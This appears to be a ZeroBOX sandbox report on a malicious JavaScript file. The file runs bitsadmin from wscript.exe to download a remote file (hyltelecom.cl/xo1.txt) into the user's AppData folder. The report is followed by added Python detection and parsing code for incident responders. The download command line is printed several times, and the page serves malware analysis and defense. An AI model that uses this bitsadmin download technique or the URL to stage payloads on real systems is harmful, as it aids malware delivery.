Summary | ZeroBOX

jRuiQlItEQ.JS

Category: FILE
Machine: s1_win7_x6402
Started: April 12, 2023, 11:35 a.m.
Completed: April 12, 2023, 11:37 a.m.
Size: 97.0KB
Type: UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5: 6c5a8e4d9ba2f4ccb0ae3444473b3353
SHA256: 07686c57e4a71462dbb2a91377c2ee7cd22a2f11c66c78188f8ccbff6fad78fd
CRC32: CEE62B8D
ssdeep: 192:BgFqgFqgFqgFqgFqgFqgFqgFqgFqgFqgFqgF0mmmmmmmmmmm6gFqgFqgFqgFqgFa:Keqsv
Yara: None matched

Name            Response        Post-Analysis Lookup
hyltelecom.cl   51.161.7.156

IP Address      Status   Action
164.124.101.2   Active   Moloch
51.161.7.156    Active   Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW (33 calls). Every call used console_handle: 0x00000007 and was recorded with Status 1, Return 1, Repeated 0; only the buffer differs. The buffers, in the order written, were:

BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
DISPLAY: '
TYPE:
DOWNLOAD
STATE:
CONNECTING
PRIORITY:
NORMAL
FILES:
BYTES:
0 / UNKNOWN
TRANSFER RATE:
0.00 B/S
DISPLAY: '
TYPE:
DOWNLOAD
STATE:
TRANSIENT_ERROR
PRIORITY:
NORMAL
FILES:
BYTES:
0 / UNKNOWN
ERROR FILE:
https://hyltelecom.cl/xo1.txt -> C:\Users\test22\AppData\Local\T
ERROR CODE:
0x80072ee2 - The operation timed out. (message printed in Korean on the analysis machine)
ERROR CONTEXT:
0x00000005 - An error occurred while processing the remote file. (message printed in Korean on the analysis machine)
Time & API Arguments Status Return Repeated

ShellExecuteExW
show_type: 0
filepath_r: bitsadmin
parameters: /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
filepath: bitsadmin
Status 1, Return 1, Repeated 0
parent_process wscript.exe martian_process "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
parent_process wscript.exe martian_process bitsadmin /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
cmdline "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
cmdline bitsadmin /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
dead_host 51.161.7.156:443
file C:\Windows\System32\bitsadmin.exe
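What the report shows is a script host (wscript.exe) launching bitsadmin /transfer to pull https://hyltelecom.cl/xo1.txt into the user's AppData\Local directory, and the BITS job never completing: the host was dead (51.161.7.156:443), so the job moved from CONNECTING to TRANSIENT_ERROR with 0x80072ee2. Two things a responder would want to check over this telemetry are shown in the added example below: a detection over process-creation records that extracts the URL and local target from any bitsadmin /transfer command line, and a parser for the console chunks bitsadmin prints during a /transfer so the final STATE and ERROR CODE can be evaluated mechanically. This is example code written for this page, not part of the ZeroBOX report or of the sample; the process records are constructed (only the two bitsadmin command lines and the URL come from the report), the field names follow Sysmon Event ID 1 as an assumption, and the Korean error messages are given in translation.

```python
"""Added example; not part of the ZeroBOX report or of the sample it analyzes.
flag_bits_downloads() scans process-creation records (Sysmon Event ID 1 style
fields, an assumption) for bitsadmin /transfer jobs that fetch a remote URL;
parse_bitsadmin_output() rebuilds the status records from the console chunks
bitsadmin prints during a /transfer, and job_verdict() reads the final STATE
and ERROR CODE. Only the two command lines, the URL and the console chunks
come from the report; the rest is constructed."""
import re

SAMPLE_PROCESS_EVENTS = [  # constructed records; field names modeled on Sysmon Event ID 1
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r'"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list /allusers"},  # benign: an admin listing jobs
]

# The parent alone is not the signal; /transfer with a remote URL is. A script
# host as parent (wscript.exe in the report) raises the priority of the hit.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

# bitsadmin /transfer <name> [/download|/upload] [/priority <p>] [/aclflags <f>]
#                     [/dynamic] <remote_url> <local_file>   (local_file is a file path)
TRANSFER_RE = re.compile(
    r'bitsadmin(?:\.exe)?"?\s+/transfer\s+(?P<job>"[^"]*"|\S+)\s+'
    r"(?:/(?:priority|aclflags)\s+\S+\s+|/\S+\s+)*"
    r"(?P<url>https?://\S+)\s+(?P<dest>\S.*?)\s*$",
    re.IGNORECASE,
)

def flag_bits_downloads(events):
    """One indicator record per bitsadmin /transfer that fetches a URL."""
    hits = []
    for ev in events:
        if ev["Image"].rsplit("\\", 1)[-1].lower() != "bitsadmin.exe":
            continue
        m = TRANSFER_RE.search(ev["CommandLine"])
        if not m:
            continue
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        hits.append({"job": m["job"].strip('"'), "url": m["url"],
                     "dest": m["dest"].strip('"'), "parent": parent,
                     "script_host_parent": parent in SCRIPT_HOSTS})
    return hits

BITSADMIN_CHUNKS = [  # WriteConsoleW buffers from the report, in order; messages translated
    "BITSADMIN version 3.0 [ 7.5.7601 ]", "BITS administration utility.",
    "(C) Copyright 2000-2006 Microsoft Corp.",
    "BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.",
    "Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.",
    "DISPLAY: '", "TYPE:", "DOWNLOAD", "STATE:", "CONNECTING", "PRIORITY:", "NORMAL",
    "FILES:", "BYTES:", "0 / UNKNOWN", "TRANSFER RATE:", "0.00 B/S",
    "DISPLAY: '", "TYPE:", "DOWNLOAD", "STATE:", "TRANSIENT_ERROR", "PRIORITY:", "NORMAL",
    "FILES:", "BYTES:", "0 / UNKNOWN",
    "ERROR FILE:", r"https://hyltelecom.cl/xo1.txt -> C:\Users\test22\AppData\Local\T",
    "ERROR CODE:", "0x80072ee2 - The operation timed out.",
    "ERROR CONTEXT:", "0x00000005 - An error occurred while processing the remote file.",
]
FIELD_RE = re.compile(r"^([A-Z][A-Z ]*):\s*(.*)$")  # "KEY:" chunks; anything else is a value

def parse_bitsadmin_output(chunks):
    """Group chunks into status records; each 'DISPLAY:' chunk starts a new one.
    Banner lines before the first DISPLAY are ignored."""
    records, current, key = [], None, None
    for chunk in chunks:
        m = FIELD_RE.match(chunk)
        if m:
            key, inline = m.group(1), m.group(2).strip(" '")
            if key == "DISPLAY":
                current = {}
                records.append(current)
            if current is not None:
                current[key] = inline or None
        elif current is not None and key is not None:
            current[key] = chunk if current[key] is None else f"{current[key]} {chunk}"
    return records

# 0x80072ee2 is ERROR_INTERNET_TIMEOUT. BITS treats it as transient: the job
# stays queued and is retried until its no-progress timeout expires, so it
# outlives the bitsadmin process (and a two-minute sandbox run) that created it.
LIVE_STATES = {"QUEUED", "CONNECTING", "TRANSFERRING", "TRANSIENT_ERROR"}

def job_verdict(records):
    """Final state of the job and whether BITS will keep retrying it."""
    last = records[-1] if records else {}
    code = (last.get("ERROR CODE") or "").split(" ", 1)[0].lower() or None
    return {"state": last.get("STATE"), "error_code": code,
            "error_file": last.get("ERROR FILE"),
            "still_queued": last.get("STATE") in LIVE_STATES}

if __name__ == "__main__":
    for hit in flag_bits_downloads(SAMPLE_PROCESS_EVENTS):
        print("bitsadmin download:", hit)
    print("job verdict:", job_verdict(parse_bitsadmin_output(BITSADMIN_CHUNKS)))
```

The verdict for the report's output is STATE TRANSIENT_ERROR with error code 0x80072ee2 and still_queued set: a BITS job in that state is not gone when bitsadmin exits, it is retried by the service, so a host that ran this script should also be checked for the leftover job (bitsadmin /list /allusers /verbose, or Get-BitsTransfer -AllUsers in PowerShell) and for the local file named in the /transfer command line, which is a file path rather than a directory.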